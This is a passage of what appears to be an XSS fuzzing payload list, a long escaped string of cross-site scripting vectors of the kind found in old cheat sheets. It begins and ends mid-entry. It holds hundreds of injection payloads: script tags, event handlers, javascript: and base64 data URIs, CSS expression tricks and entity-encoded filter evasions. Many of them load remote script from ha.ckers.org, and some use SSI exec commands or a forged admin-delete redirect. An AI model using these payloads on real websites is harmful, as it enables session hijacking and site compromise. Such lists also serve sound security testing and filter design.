src=javascript:alert(&quot;XSS&quot;)>\\r\\n<\\\"\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<EMBED SRC=\\\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n<SCRIPT a=\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT \\\"a=\\\'>\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<<SCRIPT>alert(\\\"XSS\\\");//<</SCRIPT>\\r\\n<\\\"\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search\\r\\n<script>alert(\\\"hellox worldss\\\")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\\r\\n<script>alert(\\\"XSS\\\");</script>&search=1\\r\\n0&q=\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert%2?8String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode?(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search\\r\\n<h1><font color=blue>hellox worldss</h1>\\r\\n<BODY ONLOAD=alert(\\\'hellox worldss\\\')>\\r\\n<input onfocus=write(XSS) autofocus>\\r\\n<input onblur=write(XSS) autofocus><input autofocus>\\r\\n<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\\r\\n<form><button formaction=\\\"javascript:alert(XSS)\\\">lol\\r\\n<!--<img src=\\\"--><img src=x onerror=alert(XSS)//\\\">\\r\\n<![><img src=\\\"]><img src=x onerror=alert(XSS)//\\\">\\r\\n<style><img src=\\\"</style><img src=x onerror=alert(XSS)//\\\">\\r\\n<? foo=\\\"><script>alert(1)</script>\\\">\\r\\n<! foo=\\\"><script>alert(1)</script>\\\">\\r\\n</ foo=\\\"><script>alert(1)</script>\\\">\\r\\n<? foo=\\\"><x foo=\\\'?><script>alert(1)</script>\\\'>\\\">\\r\\n<! foo=\\\"[[[Inception]]\\\"><x foo=\\\"]foo><script>alert(1)</script>\\\">\\r\\n<% foo><x foo=\\\"%><script>alert(123)</script>\\\">\\r\\n<div style=\\\"font-family:\\\'foo&#10;;color:red;\\\';\\\">LOL\\r\\nLOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>\\r\\n<script>({0:#0=alert/#0#/#0#(0)})</script>\\r\\n<svg xmlns=\\\"http://www.w3.org/2000/svg\\\">LOL<script>alert(123)</script></svg>\\r\\n&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;\\r\\n\\\\\\\\\\\";alert(\\\'XSS\\\');//\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\\\\\"XSS\\\\\\\");&lt;/SCRIPT&gt;\\r\\n&lt;INPUT TYPE=\\\\\\\"IMAGE\\\\\\\" SRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BODY BACKGROUND=\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\'XSS\\\')&gt;\\r\\n&lt;IMG DYNSRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;IMG LOWSRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BGSOUND SRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BR SIZE=\\\\\\\"&{alert(\\\'XSS\\\')}\\\\\\\"&gt;\\r\\n&lt;LAYER SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\\\\\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http&#58;//ha&#46;ckers&#46;org/xss&#46;css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Link\\\\\\\" Content=\\\\\\\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;BODY{-moz-binding&#58;url(\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\\\\\"behavior&#58; url(xss&#46;htc);\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;li {list-style-image&#58; url(\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;IMG SRC=\\\'vbscript&#058;msgbox(\\\\\\\"XSS\\\\\\\")\\\'&gt;\\r\\n&lt;IMG SRC=\\\\\\\"mocha&#58;&#91;code&#93;\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"livescript&#058;&#91;code&#93;\\\\\\\"&gt;\\r\\nžscriptualert(EXSSE)ž/scriptu\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http&#58;//;URL=javascript&#058;alert(\\\'XSS\\\');\\\\\\\"\\r\\n&lt;IFRAME SRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image&#58; url(javascript&#058;alert(\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image&#58;\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028&#46;1027\\\\0058&#46;1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image&#58; url(javascript&#058;alert(\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"width&#58; expression(alert(\\\'XSS\\\'));\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript&#58;alert(\\\\\\\"XSS\\\\\\\")\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\\\\\"xss&#58;expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;XSS STYLE=\\\\\\\"xss&#58;expression(alert(\\\'XSS\\\'))\\\\\\\"&gt;\\r\\nexp/*&lt;A STYLE=\\\'no\\\\xss&#58;noxss(\\\\\\\"*//*\\\\\\\");\\r\\nxss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\\\\\\\"XSS\\\\\\\"))\\\'&gt;\\r\\n&lt;STYLE TYPE=\\\\\\\"text/javascript\\\\\\\"&gt;alert(\\\'XSS\\\');&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\\\\\"text/css\\\\\\\"&gt;BODY{background&#58;url(\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;!--&#91;if gte IE 4&#93;&gt;\\r\\n&lt;SCRIPT&gt;alert(\\\'XSS\\\');&lt;/SCRIPT&gt;\\r\\n&lt;!&#91;endif&#93;--&gt;\\r\\n&lt;BASE HREF=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');//\\\\\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\\\\\"text/x-scriptlet\\\\\\\" DATA=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\\\\\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(\\\'XSS\\\')&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\n&lt;EMBED SRC=\\\\\\\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\" type=\\\\\\\"image/svg+xml\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\\\\\"get\\\\\\\";\\r\\nb=\\\\\\\"URL(\\\\\\\\\\\"\\\\\\\";\\r\\nc=\\\\\\\"javascript&#058;\\\\\\\";\\r\\nd=\\\\\\\"alert(\\\'XSS\\\');\\\\\\\\\\\")\\\\\\\";\\r\\neval(a+b+c+d);\\r\\n&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\\\\\\\"xss\\\\\\\" implementation=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\\\\\\\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\\\\\\\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(\\\'XSS\\\');\\\\\\\"&gt;&#93;&#93;&gt;\\r\\n&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\\r\\n&lt;XML ID=\\\\\\\"xss\\\\\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\\\\\"javas&lt;!-- --&gt;cript&#58;alert(\\\'XSS\\\')\\\\\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\\r\\n&lt;SPAN DATASRC=\\\\\\\"#xss\\\\\\\" DATAFLD=\\\\\\\"B\\\\\\\" DATAFORMATAS=\\\\\\\"HTML\\\\\\\"&gt;&lt;/SPAN&gt;\\r\\n&lt;XML SRC=\\\\\\\"xsstest&#46;xml\\\\\\\" ID=I&gt;&lt;/XML&gt;\\r\\n&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;\\r\\n&lt;?xml&#58;namespace prefix=\\\\\\\"t\\\\\\\" ns=\\\\\\\"urn&#58;schemas-microsoft-com&#58;time\\\\\\\"&gt;\\r\\n&lt;?import namespace=\\\\\\\"t\\\\\\\" implementation=\\\\\\\"#default#time2\\\\\\\"&gt;\\r\\n&lt;t&#58;set attributeName=\\\\\\\"innerHTML\\\\\\\" to=\\\\\\\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\\\\\\\"&gt;\\r\\n&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'&lt;SCR\\\'\\\\\\\"--&gt;&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;\\\'\\\\\\\"--&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';\\r\\necho(\\\'IPT&gt;alert(\\\\\\\"XSS\\\\\\\")&lt;/SCRIPT&gt;\\\'); ?&gt;\\r\\n&lt;IMG SRC=\\\\\\\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\\\\\\\"&gt;\\r\\nRedirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Set-Cookie\\\\\\\" Content=\\\\\\\"USERID=&lt;SCRIPT&gt;alert(\\\'XSS\\\')&lt;/SCRIPT&gt;\\\\\\\"&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\\\\\"CONTENT-TYPE\\\\\\\" CONTENT=\\\\\\\"text/html; charset=UTF-7\\\\\\\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(\\\'XSS\\\');+ADw-/SCRIPT+AD4-\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\\\\\" SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT =\\\\\\\"&gt;\\\\\\\" SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\\\\\" \\\'\\\' SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT \\\\\\\"a=\\\'&gt;\\\'\\\\\\\" SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\'&gt;\\\\\\\" SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document&#46;write(\\\\\\\"&lt;SCRI\\\\\\\");&lt;/SCRIPT&gt;PT SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//66&#46;102&#46;7&#46;147/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//1113982867/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"//www&#46;google&#46;com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"//google\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//ha&#46;ckers&#46;org@google\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//google&#58;ha&#46;ckers&#46;org\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//google&#46;com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//www&#46;google&#46;com&#46;/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"javascript&#058;document&#46;location=\\\'http&#58;//www&#46;google&#46;com/\\\'\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;\\r\\n%3C\\r\\n&lt\\r\\n&lt;\\r\\n&LT\\r\\n&LT;\\r\\n&#60\\r\\n&#060\\r\\n&#0060\\r\\n&#00060\\r\\n&#000060\\r\\n&#0000060\\r\\n&lt;\\r\\n&#x3c\\r\\n&#x03c\\r\\n&#x003c\\r\\n&#x0003c\\r\\n&#x00003c\\r\\n&#x000003c\\r\\n&#x3c;\\r\\n&#x03c;\\r\\n&#x003c;\\r\\n&#x0003c;\\r\\n&#x00003c;\\r\\n&#x000003c;\\r\\n&#X3c\\r\\n&#X03c\\r\\n&#X003c\\r\\n&#X0003c\\r\\n&#X00003c\\r\\n&#X000003c\\r\\n&#X3c;\\r\\n&#X03c;\\r\\n&#X003c;\\r\\n&#X0003c;\\r\\n&#X00003c;\\r\\n&#X000003c;\\r\\n&#x3C\\r\\n&#x03C\\r\\n&#x003C\\r\\n&#x0003C\\r\\n&#x00003C\\r\\n&#x000003C\\r\\n&#x3C;\\r\\n&#x03C;\\r\\n&#x003C;\\r\\n&#x0003C;\\r\\n&#x00003C;\\r\\n&#x000003C;\\r\\n&#X3C\\r\\n&#X03C\\r\\n&#X003C\\r\\n&#X0003C\\r\\n&#X00003C\\r\\n&#X000003C\\r\\n&#X3C;\\r\\n&#X03C;\\r\\n&#X003C;\\r\\n&#X0003C;\\r\\n&#X00003C;\\r\\n&#X000003C;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\\u003c\\r\\n\\\\u003C\\r\\n&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;\\r\\n&lt;IMG SRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\')\\\\\\\"\\r\\n&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;\\r\\n&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\\\\\"XSS\\\\\\\");//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT/SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\\\\&#93;^`=alert(\\\\\\\"XSS\\\\\\\")&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\\\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\\\\\"&gt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\\\\\" javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert(\\\\\\\\\\\"XSS\\\\\\\\\\\")&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG SRC=java\\\\0script&#058;alert(\\\\\\\\\\\"XSS\\\\\\\\\\\")&gt;\\\\\\\";\\\' &gt; out\\r\\n&lt;IMG SRC=\\\\\\\"jav&#x0D;ascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"jav&#x0A;ascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"jav&#x09;ascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;\\r\\n&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;\\r\\n&lt;IMG SRC=javascript&#058;alert(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG \\\\\\\"\\\\\\\"\\\\\\\"&gt;&lt;SCRIPT&gt;alert(\\\\\\\"XSS\\\\\\\")&lt;/SCRIPT&gt;\\\\\\\"&gt;\\r\\n&lt;IMG SRC=`javascript&#058;alert(\\\\\\\"RSnake says, \\\'XSS\\\'\\\\\\\")`&gt;\\r\\n&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt&#058;alert(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=javascript&#058;alert(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=\\\\\\\"javascript&#058;alert(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;\\r\\n\\\'\\\';!--\\\\\\\"&lt;XSS&gt;=&{()}\\r\\n\\\';alert(String&#46;fromCharCode(88,83,83))//\\\\\\\';alert(String&#46;fromCharCode(88,83,83))//\\\\\\\";alert(String&#46;fromCharCode(88,83,83))//\\\\\\\\\\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\\\\\"&gt;\\\'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=javascrscriptipt:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=JaVaScRiPt:alert(\\\'XSS\\\')>\\r\\n<IMG \\\"\\\"\\\"><SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\">\\r\\n<IMG SRC=\\\" &#14; javascript:alert(\\\'XSS\\\');\\\">\\r\\n<SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<<SCRIPT>alert(\\\"XSS\\\");//<</SCRIPT>\\r\\n<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\\r\\n\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE><SCRIPT>alert(\\\"XSS\\\");</SCRIPT>\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<DIV STYLE=\\\"background-image: url(javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\">\\r\\n<DIV STYLE=\\\"width: expression(alert(\\\'XSS\\\'));\\\">\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG STYLE=\\\"xss:expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\">\\r\\n<XSS STYLE=\\\"xss:expression(alert(\\\'XSS\\\'))\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))\\\'>\\r\\n<EMBED SRC=\\\"http://ha.ckers.org/xss.swf\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\na=\\\"get\\\";b=\\\"URL(ja\\\\\\\"\\\";c=\\\"vascr\\\";d=\\\"ipt:ale\\\";e=\\\"rt(\\\'XSS\\\');\\\\\\\")\\\";eval(a+b+c+d+e);\\r\\n<SCRIPT SRC=\\\"http://ha.ckers.org/xss.jpg\\\"></SCRIPT>\\r\\n<HTML><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT 